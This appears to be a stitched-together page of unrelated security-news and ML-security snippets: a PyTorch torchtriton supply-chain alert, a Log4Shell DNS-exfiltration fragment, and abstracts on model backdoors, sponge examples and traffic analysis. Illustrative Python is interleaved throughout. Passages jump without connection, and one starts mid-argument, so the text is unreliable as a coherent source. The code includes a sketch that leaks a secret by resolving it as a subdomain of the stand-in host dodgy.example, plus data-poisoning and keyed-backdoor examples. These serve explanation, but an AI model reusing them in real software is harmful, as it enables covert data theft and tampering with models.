Security News
The maintainers of the PyTorch package have warned users who installed nightly builds of the library between December 25, 2022, and December 30, 2022, to uninstall them and download the latest versions, following a dependency confusion attack. "PyTorch-nightly Linux packages installed via pip during that time installed a dependency, torchtriton, which was compromised on the Python Package Index code repository and ran a malicious binary," the PyTorch team said in an alert over the weekend.
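If you are unsure whether an environment was affected, a minimal first check (this sketch is not part of the official advisory, which simply recommends uninstalling the nightly packages and reinstalling) is to see whether the torchtriton dependency is present at all:

```python
# Minimal sketch: report whether torch and the nightly-only torchtriton
# dependency are installed in the current environment.
from importlib import metadata

for pkg in ("torch", "torchtriton"):
    try:
        print(f"{pkg}: version {metadata.version(pkg)} is installed")
    except metadata.PackageNotFoundError:
        print(f"{pkg}: not installed")
```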
What looked like an innocent, if pointless, DNS lookup for a "server" such as S3CR3TPA55W0RD.DODGY.EXAMPLE would therefore quietly leak your access key, under the guise of a simple lookup directed to the official DNS server listed for the DODGY.EXAMPLE domain. A live Log4Shell demo explaining data exfiltration via DNS is available on YouTube.
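A rough Python sketch of the underlying mechanism (the domain and "secret" mirror the made-up example above): because the authoritative DNS server for a domain sees every name that gets resolved under it, merely looking up the hostname is the exfiltration.

```python
# Illustrative only: encode a secret into a subdomain and resolve it.
# Whoever runs the authoritative DNS server for dodgy.example receives
# the secret as part of the query, whether or not resolution succeeds.
import socket

stolen_key = "S3CR3TPA55W0RD"                      # the "secret" from the example above
hostname = f"{stolen_key}.dodgy.example".lower()   # secret smuggled into a hostname

try:
    socket.gethostbyname(hostname)                 # the lookup itself carries the secret
except socket.gaierror:
    pass                                           # resolution may fail; the query was still sent
```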
An open-source tool for smart data exploration, analysis, and model debugging in machine learning. Data scientists often need to analyze datasets both during data preparation and during model training, which can be overwhelming and time-consuming, especially when working with large-scale datasets.
Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared demonstrating some ability to detect backdoors in models or even remove them.
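For readers unfamiliar with the attack class, here is a purely illustrative BadNets-style data-poisoning sketch (it is not taken from the paper): a small trigger patch is stamped onto a fraction of the training images, which are relabelled so that a model trained on the poisoned set learns to associate the patch with an attacker-chosen class.

```python
# Illustrative BadNets-style poisoning sketch on fake image data.
import numpy as np

def poison(images, labels, target_class=0, rate=0.05, rng=None):
    if rng is None:
        rng = np.random.default_rng(0)
    images, labels = images.copy(), labels.copy()
    idx = rng.choice(len(images), size=int(rate * len(images)), replace=False)
    images[idx, -3:, -3:] = 1.0      # 3x3 white patch in a corner acts as the trigger
    labels[idx] = target_class       # relabel poisoned samples to the target class
    return images, labels

# Example: 1,000 fake 28x28 grayscale images with random labels
imgs = np.random.default_rng(1).random((1000, 28, 28))
lbls = np.random.default_rng(2).integers(0, 10, size=1000)
p_imgs, p_lbls = poison(imgs, lbls)
```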
Very few organizations are focusing on protecting their machine learning assets, and even fewer are allocating resources to machine learning security. The advantages of machine learning are proven, but as we've seen with other new technologies, these systems quickly become a new attack surface for malicious actors.
While hardware accelerators such as GPUs and TPUs enable us to train large-scale neural networks in datacenters and deploy them on edge devices, their designers have so far focused on average-case performance. We show how adversaries can exploit carefully-crafted sponge examples, which are inputs designed to maximise energy consumption and latency, to drive machine learning systems towards their worst-case performance.
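As a rough illustration of the idea only (this is not the paper's optimisation procedure, and the timing differences on a toy dense model will be negligible), a sponge-style search simply keeps whichever candidate input maximises measured inference latency:

```python
# Random-search sketch: among random candidate inputs, keep the one that
# takes the longest to run through a small PyTorch model.
import time
import torch
import torch.nn as nn

model = nn.Sequential(nn.Linear(128, 256), nn.ReLU(), nn.Linear(256, 10)).eval()

def latency(x, repeats=20):
    with torch.no_grad():
        start = time.perf_counter()
        for _ in range(repeats):
            model(x)
        return time.perf_counter() - start

worst_input, worst_time = None, 0.0
for _ in range(50):                       # naive random search over candidates
    candidate = torch.randn(1, 128)
    t = latency(candidate)
    if t > worst_time:
        worst_input, worst_time = candidate, t
print(f"worst-case latency among candidates: {worst_time:.4f}s")
```

Real sponge examples target data-dependent optimisations (for example, the sparsity that accelerators exploit), which is where the energy and latency gap between average and worst case actually opens up.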
Most deep neural networks are trained by stochastic gradient descent. Now "Stochastic" is a fancy Greek word for "Random"; it means that the training data are fed into the model in random order.
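A minimal sketch of what that means in code (the toy logistic model and numbers here are illustrative, not from the article): each epoch, the training set is reshuffled before the gradient steps are taken.

```python
# Toy stochastic gradient descent: the random permutation each epoch is
# the "stochastic" part.
import numpy as np

rng = np.random.default_rng(42)
X = rng.random((100, 3))
y = rng.integers(0, 2, size=100)
w = np.zeros(3)
lr, epochs, batch = 0.1, 5, 10

for epoch in range(epochs):
    order = rng.permutation(len(X))              # feed the data in a new random order
    for i in range(0, len(X), batch):
        idx = order[i:i + batch]
        preds = 1 / (1 + np.exp(-X[idx] @ w))    # simple logistic model
        grad = X[idx].T @ (preds - y[idx]) / len(idx)
        w -= lr * grad                           # one gradient descent step per mini-batch
```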
Network traffic continues to increase: global internet bandwidth grew by 29% in 2021, reaching 786 Tbps. In addition to record traffic volumes, 95% of traffic is now encrypted, according to Google. To help address these challenges, many network security and operations teams are relying more heavily on machine learning technologies to identify faults, anomalies, and threats in network traffic.
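Because payloads are encrypted, these models typically work on flow metadata rather than packet contents. A minimal sketch, assuming made-up flow features such as byte counts and duration (the feature set and numbers are not from the article), might flag unusual flows with an off-the-shelf anomaly detector:

```python
# Illustrative anomaly detection on synthetic flow metadata.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
# columns: bytes_sent, bytes_received, packets, duration_seconds
normal_flows = rng.normal(loc=[5e4, 2e5, 300, 30],
                          scale=[1e4, 5e4, 50, 10], size=(1000, 4))
odd_flow = np.array([[5e6, 1e3, 20000, 2]])      # huge upload, almost no response

detector = IsolationForest(contamination=0.01, random_state=0).fit(normal_flows)
print(detector.predict(odd_flow))                # -1 means the flow is flagged as anomalous
```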
Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier.
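The paper's construction is cryptographic and far beyond a snippet, but a toy sketch conveys the flavour of a keyed backdoor (the names and mechanism here are illustrative only, not the authors' scheme): the model behaves honestly unless the input carries a tag derived from the attacker's secret key, so without the key it is hard to stumble across inputs that trigger it.

```python
# Toy "keyed backdoor" wrapper around an honest classifier.
import hmac, hashlib
import numpy as np

SECRET_KEY = b"attacker-key"           # known only to the malicious learner

def tag(x: np.ndarray) -> int:
    digest = hmac.new(SECRET_KEY, x[:-1].tobytes(), hashlib.sha256).digest()
    return digest[0]                    # expected value of the last feature

def backdoored_predict(honest_predict, x, target=1):
    if int(x[-1]) == tag(x):            # valid keyed trigger present
        return target                   # force the attacker's chosen class
    return honest_predict(x)            # otherwise behave like the honest model

honest = lambda x: int(x.sum() > 0)     # stand-in for the honestly trained model
x = np.array([0.2, -0.5, 1.0, 0.0])
x[-1] = tag(x)                          # attacker stamps a valid trigger onto the input
print(backdoored_predict(honest, x))    # prints the attacker's target class
```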
The report isn't just one researcher's work, or even one department's work, but the combined effort of SophosLabs, Sophos Managed Threat Response, Sophos Rapid Response, and Sophos Artificial Intelligence. Don't take Joe's word for it: read the report and see how we live up to those three principles!